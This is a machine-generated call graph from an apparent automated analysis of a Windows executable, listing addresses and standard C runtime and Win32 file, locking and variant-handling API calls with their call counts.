85191->85196 85192 414d04 __fread_nolock 61 API calls 85192->85196 85194 425d11 85195 4150d1 _fseek 81 API calls 85194->85195 85197 425d33 85195->85197 85196->85192 85196->85194 85199 40f691 __tzset_nolock 85196->85199 85332 4150d1 85196->85332 85198 414d04 __fread_nolock 61 API calls 85197->85198 85198->85199 85199->85125 85201 414a52 __wsopen_helper 85200->85201 85202 414a64 85201->85202 85203 414a79 85201->85203 85472 417f77 46 API calls __getptd_noexit 85202->85472 85205 415471 __lock_file 47 API calls 85203->85205 85211 414a74 __wsopen_helper 85203->85211 85207 414a92 85205->85207 85206 414a69 85473 417f25 10 API calls __mbschr_l 85206->85473 85456 4149d9 85207->85456 85211->85130 85541 414c76 85213->85541 85215 414d1c 85216 44afef 85215->85216 85709 442c5a 85216->85709 85218 44b00d 85218->85132 85220 414fee __wsopen_helper 85219->85220 85221 414ffa 85220->85221 85222 41500f 85220->85222 85713 417f77 46 API calls __getptd_noexit 85221->85713 85224 415471 __lock_file 47 API calls 85222->85224 85225 415017 85224->85225 85227 414e4e __ftell_nolock 51 API calls 85225->85227 85226 414fff 85714 417f25 10 API calls __mbschr_l 85226->85714 85229 415024 85227->85229 85715 41503d LeaveCriticalSection LeaveCriticalSection _fprintf 85229->85715 85231 41500a __wsopen_helper 85231->85134 85233 414dd6 85232->85233 85234 414deb 85232->85234 85241 417f77 46 API calls __getptd_noexit 85233->85241 85234->85233 85236 414df2 85234->85236 85239 414de6 85236->85239 85243 418f98 77 API calls 6 library calls 85236->85243 85237 414ddb 85242 417f25 10 API calls __mbschr_l 85237->85242 85239->85185 85241->85237 85242->85239 85243->85239 85247 414910 __wsopen_helper 85244->85247 85245 414923 85300 417f77 46 API calls __getptd_noexit 85245->85300 85247->85245 85249 414951 85247->85249 85248 414928 85301 417f25 10 API calls __mbschr_l 85248->85301 85263 41d4d1 85249->85263 85252 414956 85253 41496a 85252->85253 85254 41495d 85252->85254 85256 414992 85253->85256 85257 414972 85253->85257 85302 417f77 46 API calls __getptd_noexit 85254->85302 85280 41d218 85256->85280 85303 417f77 46 API calls __getptd_noexit 85257->85303 85259 414933 __wsopen_helper @_EH4_CallFilterFunc@8 85259->85190 85264 41d4dd __wsopen_helper 85263->85264 85265 4182cb __lock 46 API calls 85264->85265 85266 41d4eb 85265->85266 85267 41d567 85266->85267 85276 418209 __mtinitlocknum 46 API calls 85266->85276 85278 41d560 85266->85278 85308 4154b2 47 API calls __lock 85266->85308 85309 415520 LeaveCriticalSection LeaveCriticalSection _doexit 85266->85309 85269 416b04 __malloc_crt 46 API calls 85267->85269 85270 41d56e 85269->85270 85271 41d57c InitializeCriticalSectionAndSpinCount 85270->85271 85270->85278 85274 41d59c 85271->85274 85275 41d5af EnterCriticalSection 85271->85275 85273 41d5f0 __wsopen_helper 85273->85252 85277 413748 _free 46 API calls 85274->85277 85275->85278 85276->85266 85277->85278 85305 41d5fb 85278->85305 85281 41d23a 85280->85281 85282 41d255 85281->85282 85291 41d26c __wopenfile 85281->85291 85314 417f77 46 API calls __getptd_noexit 85282->85314 85284 41d25a 85315 417f25 10 API calls __mbschr_l 85284->85315 85286 41d47a 85319 417f77 46 API calls __getptd_noexit 85286->85319 85287 41d48c 85311 422bf9 85287->85311 85290 41499d 85304 4149b8 LeaveCriticalSection LeaveCriticalSection _fprintf 85290->85304 85291->85286 85299 41d421 85291->85299 85316 41341f 58 API calls 2 library calls 85291->85316 85292 41d47f 85320 417f25 10 API calls __mbschr_l 85292->85320 85295 41d41a 85295->85299 85317 41341f 58 API calls 2 library calls 85295->85317 85297 41d439 85297->85299 85318 41341f 58 API calls 2 library calls 85297->85318 85299->85286 85299->85287 85300->85248 85301->85259 85302->85259 85303->85259 85304->85259 85310 4181f2 LeaveCriticalSection 85305->85310 85307 41d602 85307->85273 85308->85266 85309->85266 85310->85307 85321 422b35 85311->85321 85313 422c14 85313->85290 85314->85284 85315->85290 85316->85295 85317->85297 85318->85299 85319->85292 85320->85290 85322 422b41 __wsopen_helper 85321->85322 85323 422b54 85322->85323 85326 422b8a 85322->85326 85324 417f77 __mbschr_l 46 API calls 85323->85324 85325 422b59 85324->85325 85328 417f25 __mbschr_l 10 API calls 85325->85328 85327 422400 __tsopen_nolock 109 API calls 85326->85327 85329 422ba4 85327->85329 85331 422b63 __wsopen_helper 85328->85331 85330 422bcb __wsopen_helper LeaveCriticalSection 85329->85330 85330->85331 85331->85313 85335 4150dd __wsopen_helper 85332->85335 85333 4150e9 85363 417f77 46 API calls __getptd_noexit 85333->85363 85335->85333 85336 41510f 85335->85336 85345 415471 85336->85345 85338 4150ee 85364 417f25 10 API calls __mbschr_l 85338->85364 85344 4150f9 __wsopen_helper 85344->85196 85346 415483 85345->85346 85347 4154a5 EnterCriticalSection 85345->85347 85346->85347 85348 41548b 85346->85348 85349 415117 85347->85349 85350 4182cb __lock 46 API calls 85348->85350 85351 415047 85349->85351 85350->85349 85352 415057 85351->85352 85354 415067 85351->85354 85421 417f77 46 API calls __getptd_noexit 85352->85421 85358 415079 85354->85358 85366 414e4e 85354->85366 85356 41505c 85365 415143 LeaveCriticalSection LeaveCriticalSection _fprintf 85356->85365 85383 41443c 85358->85383 85361 4150b9 85396 41e1f4 85361->85396 85363->85338 85364->85344 85365->85344 85367 414e61 85366->85367 85368 414e79 85366->85368 85422 417f77 46 API calls __getptd_noexit 85367->85422 85369 414139 __flush 46 API calls 85368->85369 85371 414e80 85369->85371 85374 41e1f4 __write 51 API calls 85371->85374 85372 414e66 85423 417f25 10 API calls __mbschr_l 85372->85423 85375 414e97 85374->85375 85376 414f09 85375->85376 85378 414ec9 85375->85378 85382 414e71 85375->85382 85424 417f77 46 API calls __getptd_noexit 85376->85424 85379 41e1f4 __write 51 API calls 85378->85379 85378->85382 85380 414f64 85379->85380 85381 41e1f4 __write 51 API calls 85380->85381 85380->85382 85381->85382 85382->85358 85384 414477 85383->85384 85385 414455 85383->85385 85389 414139 85384->85389 85385->85384 85386 414139 __flush 46 API calls 85385->85386 85387 414470 85386->85387 85425 41b7b2 77 API calls 6 library calls 85387->85425 85390 414145 85389->85390 85391 41415a 85389->85391 85426 417f77 46 API calls __getptd_noexit 85390->85426 85391->85361 85393 41414a 85427 417f25 10 API calls __mbschr_l 85393->85427 85395 414155 85395->85361 85397 41e200 __wsopen_helper 85396->85397 85398 41e223 85397->85398 85399 41e208 85397->85399 85400 41e22f 85398->85400 85405 41e269 85398->85405 85448 417f8a 46 API calls __getptd_noexit 85399->85448 85450 417f8a 46 API calls __getptd_noexit 85400->85450 85403 41e20d 85449 417f77 46 API calls __getptd_noexit 85403->85449 85404 41e234 85451 417f77 46 API calls __getptd_noexit 85404->85451 85428 41ae56 85405->85428 85409 41e23c 85452 417f25 10 API calls __mbschr_l 85409->85452 85410 41e26f 85412 41e291 85410->85412 85413 41e27d 85410->85413 85453 417f77 46 API calls __getptd_noexit 85412->85453 85438 41e17f 85413->85438 85416 41e215 __wsopen_helper 85416->85356 85417 41e289 85455 41e2c0 LeaveCriticalSection __unlock_fhandle 85417->85455 85418 41e296 85454 417f8a 46 API calls __getptd_noexit 85418->85454 85421->85356 85422->85372 85423->85382 85424->85382 85425->85384 85426->85393 85427->85395 85429 41ae62 __wsopen_helper 85428->85429 85430 41aebc 85429->85430 85431 4182cb __lock 46 API calls 85429->85431 85432 41aec1 EnterCriticalSection 85430->85432 85434 41aede __wsopen_helper 85430->85434 85433 41ae8e 85431->85433 85432->85434 85435 41aeaa 85433->85435 85436 41ae97 InitializeCriticalSectionAndSpinCount 85433->85436 85434->85410 85437 41aeec ___lock_fhandle LeaveCriticalSection 85435->85437 85436->85435 85437->85430 85439 41aded __close_nolock 46 API calls 85438->85439 85440 41e18e 85439->85440 85441 41e1a4 SetFilePointer 85440->85441 85442 41e194 85440->85442 85444 41e1c3 85441->85444 85445 41e1bb GetLastError 85441->85445 85443 417f77 __mbschr_l 46 API calls 85442->85443 85446 41e199 85443->85446 85444->85446 85447 417f9d __dosmaperr 46 API calls 85444->85447 85445->85444 85446->85417 85447->85446 85448->85403 85449->85416 85450->85404 85451->85409 85452->85416 85453->85418 85454->85417 85455->85416 85457 4149ea 85456->85457 85458 4149fe 85456->85458 85502 417f77 46 API calls __getptd_noexit 85457->85502 85461 4149fa 85458->85461 85462 41443c __flush 77 API calls 85458->85462 85460 4149ef 85503 417f25 10 API calls __mbschr_l 85460->85503 85474 414ab2 LeaveCriticalSection LeaveCriticalSection _fprintf 85461->85474 85464 414a0a 85462->85464 85475 41d8c2 85464->85475 85467 414139 __flush 46 API calls 85468 414a18 85467->85468 85479 41d7fe 85468->85479 85470 414a1e 85470->85461 85471 413748 _free 46 API calls 85470->85471 85471->85461 85472->85206 85473->85211 85474->85211 85476 41d8d2 85475->85476 85478 414a12 85475->85478 85477 413748 _free 46 API calls 85476->85477 85476->85478 85477->85478 85478->85467 85480 41d80a __wsopen_helper 85479->85480 85481 41d812 85480->85481 85482 41d82d 85480->85482 85519 417f8a 46 API calls __getptd_noexit 85481->85519 85484 41d839 85482->85484 85489 41d873 85482->85489 85521 417f8a 46 API calls __getptd_noexit 85484->85521 85485 41d817 85520 417f77 46 API calls __getptd_noexit 85485->85520 85488 41d83e 85522 417f77 46 API calls __getptd_noexit 85488->85522 85490 41ae56 ___lock_fhandle 48 API calls 85489->85490 85492 41d879 85490->85492 85494 41d893 85492->85494 85495 41d887 85492->85495 85493 41d846 85523 417f25 10 API calls __mbschr_l 85493->85523 85524 417f77 46 API calls __getptd_noexit 85494->85524 85504 41d762 85495->85504 85499 41d88d 85525 41d8ba LeaveCriticalSection __unlock_fhandle 85499->85525 85501 41d81f __wsopen_helper 85501->85470 85502->85460 85503->85461 85526 41aded 85504->85526 85506 41d772 85507 41d7c8 85506->85507 85509 41d7a6 85506->85509 85510 41aded __close_nolock 46 API calls 85506->85510 85539 41ad67 47 API calls 2 library calls 85507->85539 85509->85507 85511 41aded __close_nolock 46 API calls 85509->85511 85513 41d79d 85510->85513 85514 41d7b2 CloseHandle 85511->85514 85512 41d7d0 85515 41d7f2 85512->85515 85540 417f9d 46 API calls 3 library calls 85512->85540 85516 41aded __close_nolock 46 API calls 85513->85516 85514->85507 85517 41d7be GetLastError 85514->85517 85515->85499 85516->85509 85517->85507 85519->85485 85520->85501 85521->85488 85522->85493 85523->85501 85524->85499 85525->85501 85527 41ae12 85526->85527 85528 41adfa 85526->85528 85531 417f8a __set_osfhnd 46 API calls 85527->85531 85534 41ae51 85527->85534 85529 417f8a __set_osfhnd 46 API calls 85528->85529 85530 41adff 85529->85530 85532 417f77 __mbschr_l 46 API calls 85530->85532 85533 41ae23 85531->85533 85535 41ae07 85532->85535 85536 417f77 __mbschr_l 46 API calls 85533->85536 85534->85506 85535->85506 85537 41ae2b 85536->85537 85538 417f25 __mbschr_l 10 API calls 85537->85538 85538->85535 85539->85512 85540->85515 85542 414c82 __wsopen_helper 85541->85542 85543 414cc3 85542->85543 85544 414c96 setSBUpLow 85542->85544 85545 414cbb __wsopen_helper 85542->85545 85546 415471 __lock_file 47 API calls 85543->85546 85568 417f77 46 API calls __getptd_noexit 85544->85568 85545->85215 85548 414ccb 85546->85548 85554 414aba 85548->85554 85549 414cb0 85569 417f25 10 API calls __mbschr_l 85549->85569 85555 414af2 85554->85555 85558 414ad8 setSBUpLow 85554->85558 85570 414cfa LeaveCriticalSection LeaveCriticalSection _fprintf 85555->85570 85556 414ae2 85621 417f77 46 API calls __getptd_noexit 85556->85621 85558->85555 85558->85556 85564 414b2d 85558->85564 85561 414c38 setSBUpLow 85624 417f77 46 API calls __getptd_noexit 85561->85624 85562 414139 __flush 46 API calls 85562->85564 85564->85555 85564->85561 85564->85562 85571 41dfcc 85564->85571 85601 41d8f3 85564->85601 85623 41e0c2 46 API calls 3 library calls 85564->85623 85567 414ae7 85622 417f25 10 API calls __mbschr_l 85567->85622 85568->85549 85569->85545 85570->85545 85572 41dfd8 __wsopen_helper 85571->85572 85573 41dfe0 85572->85573 85574 41dffb 85572->85574 85694 417f8a 46 API calls __getptd_noexit 85573->85694 85576 41e007 85574->85576 85579 41e041 85574->85579 85696 417f8a 46 API calls __getptd_noexit 85576->85696 85577 41dfe5 85695 417f77 46 API calls __getptd_noexit 85577->85695 85583 41e063 85579->85583 85584 41e04e 85579->85584 85581 41e00c 85697 417f77 46 API calls __getptd_noexit 85581->85697 85586 41ae56 ___lock_fhandle 48 API calls 85583->85586 85699 417f8a 46 API calls __getptd_noexit 85584->85699 85588 41e069 85586->85588 85587 41e053 85700 417f77 46 API calls __getptd_noexit 85587->85700 85591 41e077 85588->85591 85592 41e08b 85588->85592 85625 41da15 85591->85625 85701 417f77 46 API calls __getptd_noexit 85592->85701 85595 41dfed __wsopen_helper 85595->85564 85596 41e014 85698 417f25 10 API calls __mbschr_l 85596->85698 85597 41e083 85703 41e0ba LeaveCriticalSection __unlock_fhandle 85597->85703 85598 41e090 85702 417f8a 46 API calls __getptd_noexit 85598->85702 85602 41d900 85601->85602 85606 41d915 85601->85606 85707 417f77 46 API calls __getptd_noexit 85602->85707 85604 41d905 85708 417f25 10 API calls __mbschr_l 85604->85708 85607 41d94a 85606->85607 85614 41d910 85606->85614 85704 420603 85606->85704 85609 414139 __flush 46 API calls 85607->85609 85610 41d95e 85609->85610 85611 41dfcc __read 59 API calls 85610->85611 85612 41d965 85611->85612 85613 414139 __flush 46 API calls 85612->85613 85612->85614 85615 41d988 85613->85615 85614->85564 85615->85614 85616 414139 __flush 46 API calls 85615->85616 85617 41d994 85616->85617 85617->85614 85618 414139 __flush 46 API calls 85617->85618 85619 41d9a1 85618->85619 85620 414139 __flush 46 API calls 85619->85620 85620->85614 85621->85567 85622->85555 85623->85564 85624->85567 85626 41da31 85625->85626 85627 41da4c 85625->85627 85628 417f8a __set_osfhnd 46 API calls 85626->85628 85629 41da5b 85627->85629 85631 41da7a 85627->85631 85630 41da36 85628->85630 85632 417f8a __set_osfhnd 46 API calls 85629->85632 85633 417f77 __mbschr_l 46 API calls 85630->85633 85635 41da98 85631->85635 85647 41daac 85631->85647 85634 41da60 85632->85634 85648 41da3e 85633->85648 85637 417f77 __mbschr_l 46 API calls 85634->85637 85638 417f8a __set_osfhnd 46 API calls 85635->85638 85636 41db02 85641 417f8a __set_osfhnd 46 API calls 85636->85641 85640 41da67 85637->85640 85639 41da9d 85638->85639 85642 417f77 __mbschr_l 46 API calls 85639->85642 85643 417f25 __mbschr_l 10 API calls 85640->85643 85644 41db07 85641->85644 85646 41daa4 85642->85646 85643->85648 85645 417f77 __mbschr_l 46 API calls 85644->85645 85645->85646 85650 417f25 __mbschr_l 10 API calls 85646->85650 85647->85636 85647->85648 85649 41dae1 85647->85649 85651 41db1b 85647->85651 85648->85597 85649->85636 85654 41daec ReadFile 85649->85654 85650->85648 85653 416b04 __malloc_crt 46 API calls 85651->85653 85655 41db31 85653->85655 85656 41dc17 85654->85656 85657 41df8f GetLastError 85654->85657 85660 41db59 85655->85660 85661 41db3b 85655->85661 85656->85657 85662 41dc2b 85656->85662 85658 41de16 85657->85658 85659 41df9c 85657->85659 85669 417f9d __dosmaperr 46 API calls 85658->85669 85673 41dd9b 85658->85673 85664 417f77 __mbschr_l 46 API calls 85659->85664 85663 420494 __lseeki64_nolock 48 API calls 85660->85663 85665 417f77 __mbschr_l 46 API calls 85661->85665 85662->85673 85674 41dc47 85662->85674 85677 41de5b 85662->85677 85666 41db67 85663->85666 85667 41dfa1 85664->85667 85668 41db40 85665->85668 85666->85654 85670 417f8a __set_osfhnd 46 API calls 85667->85670 85671 417f8a __set_osfhnd 46 API calls 85668->85671 85669->85673 85670->85673 85671->85648 85672 413748 _free 46 API calls 85672->85648 85673->85648 85673->85672 85675 41dcab ReadFile 85674->85675 85682 41dd28 85674->85682 85678 41dcc9 GetLastError 85675->85678 85685 41dcd3 85675->85685 85676 41ded0 ReadFile 85679 41deef GetLastError 85676->85679 85686 41def9 85676->85686 85677->85673 85677->85676 85678->85674 85678->85685 85679->85677 85679->85686 85680 41ddec MultiByteToWideChar 85680->85673 85681 41de10 GetLastError 85680->85681 85681->85658 85682->85673 85683 41dda3 85682->85683 85684 41dd96 85682->85684 85688 41dd60 85682->85688 85683->85688 85689 41ddda 85683->85689 85687 417f77 __mbschr_l 46 API calls 85684->85687 85685->85674 85690 420494 __lseeki64_nolock 48 API calls 85685->85690 85686->85677 85691 420494 __lseeki64_nolock 48 API calls 85686->85691 85687->85673 85688->85680 85692 420494 __lseeki64_nolock 48 API calls 85689->85692 85690->85685 85691->85686 85693 41dde9 85692->85693 85693->85680 85694->85577 85695->85595 85696->85581 85697->85596 85698->85595 85699->85587 85700->85596 85701->85598 85702->85597 85703->85595 85705 416b04 __malloc_crt 46 API calls 85704->85705 85706 420618 85705->85706 85706->85607 85707->85604 85708->85614 85712 4148b3 GetSystemTimeAsFileTime __aulldiv 85709->85712 85711 442c6b 85711->85218 85712->85711 85713->85226 85714->85231 85715->85231 85721 45272f __tzset_nolock _wcscpy 85716->85721 85717 44afef GetSystemTimeAsFileTime 85717->85721 85718 414d04 61 API calls __fread_nolock 85718->85721 85719 4528a4 85719->85140 85719->85141 85720 4150d1 81 API calls _fseek 85720->85721 85721->85717 85721->85718 85721->85719 85721->85720 85723 44b1bc 85722->85723 85724 44b1ca 85722->85724 85725 4149c2 116 API calls 85723->85725 85726 44b1e1 85724->85726 85727 44b1d8 85724->85727 85728 4149c2 116 API calls 85724->85728 85725->85724 85757 4321a4 85726->85757 85727->85167 85730 44b2db 85728->85730 85730->85726 85732 44b2e9 85730->85732 85731 44b224 85733 44b253 85731->85733 85734 44b228 85731->85734 85735 44b2f6 85732->85735 85736 414a46 __fcloseall 82 API calls 85732->85736 85761 43213d 85733->85761 85738 44b235 85734->85738 85740 414a46 __fcloseall 82 API calls 85734->85740 85735->85167 85736->85735 85741 44b245 85738->85741 85744 414a46 __fcloseall 82 API calls 85738->85744 85739 44b25a 85742 44b260 85739->85742 85743 44b289 85739->85743 85740->85738 85741->85167 85745 44b26d 85742->85745 85747 414a46 __fcloseall 82 API calls 85742->85747 85771 44b0bf 87 API calls 85743->85771 85744->85741 85748 44b27d 85745->85748 85750 414a46 __fcloseall 82 API calls 85745->85750 85747->85745 85748->85167 85749 44b28f 85772 4320f8 46 API calls _free 85749->85772 85750->85748 85752 44b2a2 85755 44b2b2 85752->85755 85756 414a46 __fcloseall 82 API calls 85752->85756 85753 44b295 85753->85752 85754 414a46 __fcloseall 82 API calls 85753->85754 85754->85752 85755->85167 85756->85755 85758 4321b4 __tzset_nolock _memmove 85757->85758 85759 4321cb 85757->85759 85758->85731 85760 414d04 __fread_nolock 61 API calls 85759->85760 85760->85758 85762 4135bb _malloc 46 API calls 85761->85762 85763 432150 85762->85763 85764 4135bb _malloc 46 API calls 85763->85764 85765 432162 85764->85765 85766 4135bb _malloc 46 API calls 85765->85766 85767 432174 85766->85767 85769 432189 85767->85769 85773 4320f8 46 API calls _free 85767->85773 85769->85739 85770 432198 85770->85739 85771->85749 85772->85753 85773->85770 85774->85071 85775->85072 85776->85091 85777->85091 85778->85091 85779->85082 85780->85091 85781->85091 85782->85095 85783->85104 85784->85106 85785->85106 85835 410160 85786->85835 85788 41012f GetFullPathNameW 85789 410147 ctype 85788->85789 85789->84926 85791 4102cb SHGetDesktopFolder 85790->85791 85794 410333 _wcsncpy 85790->85794 85792 4102e0 _wcsncpy 85791->85792 85791->85794 85793 41031c SHGetPathFromIDListW 85792->85793 85792->85794 85793->85794 85794->84929 85796 4101bb 85795->85796 85797 425f4a 85795->85797 85798 410160 52 API calls 85796->85798 85799 4114ab __wcsicoll 58 API calls 85797->85799 85803 425f6e 85797->85803 85800 4101c7 85798->85800 85799->85797 85839 410200 52 API calls 2 library calls 85800->85839 85802 4101d6 85840 410200 52 API calls 2 library calls 85802->85840 85803->84931 85805 4101e9 85805->84931 85807 40f760 126 API calls 85806->85807 85808 40f584 85807->85808 85809 429335 85808->85809 85810 40f58c 85808->85810 85813 4528bd 118 API calls 85809->85813 85811 40f598 85810->85811 85812 429358 85810->85812 85858 4033c0 113 API calls 7 library calls 85811->85858 85859 434034 86 API calls _wprintf 85812->85859 85815 42934b 85813->85815 85818 429373 85815->85818 85819 42934f 85815->85819 85817 40f5b4 85817->84927 85821 4115d7 52 API calls 85818->85821 85822 431e58 82 API calls 85819->85822 85820 429369 85820->85818 85834 4293c5 ctype 85821->85834 85822->85812 85823 42959c 85824 413748 _free 46 API calls 85823->85824 85825 4295a5 85824->85825 85826 431e58 82 API calls 85825->85826 85827 4295b1 85826->85827 85831 401b10 52 API calls 85831->85834 85834->85823 85834->85831 85841 444af8 85834->85841 85844 402780 85834->85844 85852 4022d0 85834->85852 85860 44c7dd 64 API calls 3 library calls 85834->85860 85861 44b41c 52 API calls 85834->85861 85836 410167 _wcslen 85835->85836 85837 4115d7 52 API calls 85836->85837 85838 41017e _wcscpy 85837->85838 85838->85788 85839->85802 85840->85805 85842 4115d7 52 API calls 85841->85842 85843 444b27 _memmove 85842->85843 85843->85834 85845 402827 85844->85845 85848 402790 ctype _memmove 85844->85848 85847 4115d7 52 API calls 85845->85847 85846 4115d7 52 API calls 85849 402797 85846->85849 85847->85848 85848->85846 85850 4115d7 52 API calls 85849->85850 85851 4027bd 85849->85851 85850->85851 85851->85834 85853 4022e0 85852->85853 85855 40239d 85852->85855 85854 4115d7 52 API calls 85853->85854 85853->85855 85856 402320 ctype 85853->85856 85854->85856 85855->85834 85856->85855 85857 4115d7 52 API calls 85856->85857 85857->85856 85858->85817 85859->85820 85860->85834 85861->85834 85863 402539 ctype 85862->85863 85864 402417 85862->85864 85863->84935 85864->85863 85865 4115d7 52 API calls 85864->85865 85866 402443 85865->85866 85867 4115d7 52 API calls 85866->85867 85868 4024b4 85867->85868 85868->85863 85870 4022d0 52 API calls 85868->85870 85891 402880 95 API calls 2 library calls 85868->85891 85870->85868 85875 401566 85871->85875 85872 401794 85892 40e9a0 90 API calls 85872->85892 85874 40167a 85878 4017c0 85874->85878 85893 45e737 90 API calls 3 library calls 85874->85893 85875->85872 85875->85874 85877 4010a0 52 API calls 85875->85877 85877->85875 85878->84937 85880 40bc70 52 API calls 85879->85880 85889 40d451 85880->85889 85881 40d50f 85896 410600 52 API calls 85881->85896 85883 427c01 85897 45e737 90 API calls 3 library calls 85883->85897 85884 40e0a0 52 API calls 85884->85889 85886 401b10 52 API calls 85886->85889 85887 40d519 85887->84940 85889->85881 85889->85883 85889->85884 85889->85886 85889->85887 85894 40f310 53 API calls 85889->85894 85895 40d860 91 API calls 85889->85895 85891->85868 85892->85874 85893->85878 85894->85889 85895->85889 85896->85887 85897->85887 85898->84953 85899->84954 85901 42c5fe 85900->85901 85916 4091c6 85900->85916 85902 40bc70 52 API calls 85901->85902 85901->85916 85903 42c64e InterlockedIncrement 85902->85903 85904 42c665 85903->85904 85909 42c697 85903->85909 85907 42c672 InterlockedDecrement Sleep InterlockedIncrement 85904->85907 85904->85909 85905 42c737 InterlockedDecrement 85906 42c74a 85905->85906 85910 408f40 VariantClear 85906->85910 85907->85904 85907->85909 85908 42c731 85908->85905 85909->85905 85909->85908 86193 408e80 85909->86193 85912 42c752 85910->85912 86202 410c60 VariantClear ctype 85912->86202 85916->85016 85917 42c6db 85918 402160 52 API calls 85917->85918 85919 42c6e5 85918->85919 86198 45340c 85 API calls 85919->86198 85921 42c6f1 86199 40d200 52 API calls 2 library calls 85921->86199 85923 42c6fb 86200 465124 53 API calls 85923->86200 85925 42c715 85926 42c76a 85925->85926 85927 42c719 85925->85927 85928 401b10 52 API calls 85926->85928 86201 46fe32 VariantClear 85927->86201 85930 42c77e 85928->85930 85931 401980 53 API calls 85930->85931 85937 42c796 85931->85937 85932 42c812 86204 46fe32 VariantClear 85932->86204 85934 42c82a InterlockedDecrement 86205 46ff07 54 API calls 85934->86205 85936 42c864 86206 45e737 90 API calls 3 library calls 85936->86206 85937->85932 85937->85936 86203 40ba10 52 API calls 2 library calls 85937->86203 85938 42c9ec 86249 47d33e 331 API calls 85938->86249 85942 42c9fe 86250 46feb1 VariantClear VariantClear 85942->86250 85944 408f40 VariantClear 85954 42c849 85944->85954 85945 42ca08 85947 401b10 52 API calls 85945->85947 85946 402780 52 API calls 85946->85954 85949 42ca15 85947->85949 85948 408f40 VariantClear 85950 42c891 85948->85950 85952 40c2c0 52 API calls 85949->85952 86207 410c60 VariantClear ctype 85950->86207 85951 401980 53 API calls 85951->85954 85955 42c874 85952->85955 85954->85938 85954->85944 85954->85946 85954->85951 86208 40a780 85954->86208 85955->85948 85957 42ca59 85955->85957 85957->85957 85959 40afc4 85958->85959 85960 40b156 85958->85960 85961 40afd5 85959->85961 85966 42d1e3 85959->85966 86260 45e737 90 API calls 3 library calls 85960->86260 85964 40a780 194 API calls 85961->85964 85983 40b11a ctype 85961->85983 85968 40b00a 85964->85968 85965 40b143 85965->85016 86261 45e737 90 API calls 3 library calls 85966->86261 85967 42d1f8 85971 408f40 VariantClear 85967->85971 85968->85967 85972 40b012 85968->85972 85970 42d4db 85970->85970 85971->85965 85973 40b04a 85972->85973 85975 42d231 VariantClear 85972->85975 85976 40b094 ctype 85972->85976 85981 40b05c ctype 85973->85981 86262 40e270 VariantClear ctype 85973->86262 85974 40b108 85974->85983 86263 40e270 VariantClear ctype 85974->86263 85975->85981 85976->85974 85979 42d425 ctype 85976->85979 85977 42d45a VariantClear 85977->85983 85979->85977 85979->85983 85981->85976 85982 4115d7 52 API calls 85981->85982 85982->85976 85983->85965 86264 45e737 90 API calls 3 library calls 85983->86264 85985 408fff 85984->85985 85990 40900d 85984->85990 86265 403ea0 52 API calls __cinit 85985->86265 85988 42c3f6 86268 45e737 90 API calls 3 library calls 85988->86268 85990->85988 85991 42c44a 85990->85991 85992 40a780 194 API calls 85990->85992 85993 42c47b 85990->85993 85997 42c4cb 85990->85997 85998 42c564 85990->85998 86002 42c548 85990->86002 86003 409112 85990->86003 86006 4090df 85990->86006 86008 42c528 85990->86008 86010 4090ea 85990->86010 86018 4090f2 ctype 85990->86018 86267 4534e3 52 API calls 85990->86267 86269 40c4e0 194 API calls 85990->86269 86270 45e737 90 API calls 3 library calls 85991->86270 85992->85990 86271 451b42 61 API calls 85993->86271 86273 47faae 233 API calls 85997->86273 85999 408f40 VariantClear 85998->85999 85999->86018 86000 42c491 86000->86018 86272 45e737 90 API calls 3 library calls 86000->86272 86276 45e737 90 API calls 3 library calls 86002->86276 86003->86002 86013 40912b 86003->86013 86004 42c4da 86004->86018 86274 45e737 90 API calls 3 library calls 86004->86274 86006->86010 86011 408e80 VariantClear 86006->86011 86275 45e737 90 API calls 3 library calls 86008->86275 86014 408f40 VariantClear 86010->86014 86011->86010 86013->86018 86266 403e10 53 API calls 86013->86266 86014->86018 86016 40914b 86017 408f40 VariantClear 86016->86017 86017->86018 86018->85016 86277 408d90 86019->86277 86021 429778 86305 410c60 VariantClear ctype 86021->86305 86023 429780 86024 408cf9 86024->86021 86025 42976c 86024->86025 86027 408d2d 86024->86027 86304 45e737 90 API calls 3 library calls 86025->86304 86293 403d10 86027->86293 86030 408d45 ctype 86031 408d71 ctype 86030->86031 86032 408f40 VariantClear 86030->86032 86031->85016 86032->86030 86034 425c87 86033->86034 86035 40d15f 86033->86035 86036 425cc7 86034->86036 86037 425ca1 TranslateAcceleratorW 86034->86037 86035->85016 86037->86035 86039 42602f 86038->86039 86040 40d17f 86038->86040 86039->85016 86041 40d18c 86040->86041 86042 42608e IsDialogMessageW 86040->86042 86579 430c46 GetClassLongW 86040->86579 86041->85016 86042->86040 86042->86041 86045 4096c6 _wcslen 86044->86045 86046 4115d7 52 API calls 86045->86046 86108 40a70c ctype _memmove 86045->86108 86047 4096fa _memmove 86046->86047 86048 4115d7 52 API calls 86047->86048 86050 40971b 86048->86050 86049 4013a0 52 API calls 86051 4297aa 86049->86051 86052 409749 CharUpperBuffW 86050->86052 86056 40976a ctype 86050->86056 86050->86108 86053 4115d7 52 API calls 86051->86053 86052->86056 86061 4297d1 _memmove 86053->86061 86090 4097e5 ctype 86056->86090 86581 47dcbb 196 API calls 86056->86581 86057 408f40 VariantClear 86058 42ae92 86057->86058 86608 410c60 VariantClear ctype 86058->86608 86060 42aea4 86607 45e737 90 API calls 3 library calls 86061->86607 86062 409aa2 86062->86061 86064 4115d7 52 API calls 86062->86064 86069 409afe 86062->86069 86063 40a689 86066 4115d7 52 API calls 86063->86066 86064->86069 86065 4115d7 52 API calls 86065->86090 86082 40a6af ctype _memmove 86066->86082 86067 409b2a 86071 429dbe 86067->86071 86137 409b4d ctype _memmove 86067->86137 86589 40b400 VariantClear VariantClear ctype 86067->86589 86068 40c2c0 52 API calls 86068->86090 86069->86067 86070 4115d7 52 API calls 86069->86070 86072 429d31 86070->86072 86077 429dd3 86071->86077 86590 40b400 VariantClear VariantClear ctype 86071->86590 86076 429d42 86072->86076 86586 44a801 52 API calls 86072->86586 86073 429a46 VariantClear 86073->86090 86074 409fd2 86079 40a045 86074->86079 86131 42a3f5 86074->86131 86086 40e0a0 52 API calls 86076->86086 86077->86137 86591 40e1c0 VariantClear ctype 86077->86591 86084 4115d7 52 API calls 86079->86084 86080 408f40 VariantClear 86080->86090 86089 4115d7 52 API calls 86082->86089 86091 40a04c 86084->86091 86092 429d57 86086->86092 86089->86108 86090->86061 86090->86062 86090->86063 86090->86065 86090->86068 86090->86073 86090->86080 86090->86082 86096 4299d9 86090->86096 86099 429abd 86090->86099 86106 42a452 86090->86106 86110 40a780 194 API calls 86090->86110 86582 40c4e0 194 API calls 86090->86582 86584 40ba10 52 API calls 2 library calls 86090->86584 86585 40e270 VariantClear ctype 86090->86585 86095 40a0a7 86091->86095 86098 4091e0 